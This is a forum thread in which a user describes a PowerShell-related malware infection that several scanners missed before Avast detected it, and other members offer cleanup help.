I was using AVIRA Anti-Virus FREE Edition from past 2 years. However that particular software somehow allowed powershell.exe virus enter into my system. It’s been residing on my system from past 3 or 4 months and Avira just watched silently. Did nothing about it! I always updated my virus definition to the latest version.
Whenever I restarted my computer. A small window (with no content) would pop-up whose name was “powershell” and after few seconds it would automatically disappear. Today I was browsing the web and suddenly my CPU usage went sky high. I am not sure what suddenly triggered this? And something was not right at all. It seems like some sort of software installation was taking place in the background.
I had to disconnect my internet and had to force shut down my computer. After restarting my system, I started Malwarebytes (which was fortunately there on my system), updated it and started FULL scan. After few minutes Malwarebytes was totally stuck at 81% for more than 30 minutes. I don’t know what happened?
But it’s auto protection kept on blocking “soplifan.ru” (C:\Windows\SysWOW64\msiexec.exe) from connecting to the internet. See attached screenshot.
Malwarebytes was stuck so I downloaded both superantispyware and Spybot S&D - Updated them. Ran full scan. No detection!
Now Avast came to my mind. I immediately downloaded and updated your software. And without any scan, your software’s auto-protection feature caught the malware within few seconds! See attached screenshots.
Thanks AVAST. I am impressed. Keep up the good work.
If you can share the output of the autoruns with me I can help you with the finding of the virus if we haven’t remove it completely.
You can share the download link with me via a PM.
Yes, but the infection can still be present on your system.
I strongly suggest to follow the instructions in the link I gave you and have one of the malware removers have a look.
